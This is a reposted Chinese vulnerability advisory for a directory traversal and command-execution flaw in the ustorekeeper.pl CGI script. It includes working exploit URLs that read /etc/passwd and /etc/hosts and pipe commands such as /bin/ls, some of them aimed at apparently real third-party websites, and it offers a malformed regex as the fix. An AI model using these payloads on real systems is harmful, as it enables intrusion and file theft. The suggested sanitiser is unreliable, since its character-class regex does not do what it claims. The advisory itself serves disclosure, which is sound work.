ustorekeeper.pl目录遍历漏洞

2008-04-09 04:35:04来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

ustorekeeper.pl目录遍历漏洞

发布日期:2001-04-04
更新日期:2001-04-04

受影响系统:

ustorekeeper.pl version 1.61 (可能包括其他版本)
描述:

向受此问题影响的目标主机提交如下URL请求,

http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts

http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |

由于ustorekeeper.pl在处理输入时没有过滤"../",导致远程用户可以遍历服务器文
件系统,访问那些本来不该被访问到的文件,比如/etc/passwd。

<* 来源:XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


参看漏洞描述

http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd

http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../
bin/cat ustorekeeper.pl |



建议:

一个临时解决办法是过滤URL请求串中的"../"
# this will help in somewhat...
$input =~ s/[(\.\.)|\/]//g;

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Internet

下一篇:SCO Unixware中/search97cgi/vtopic 的漏洞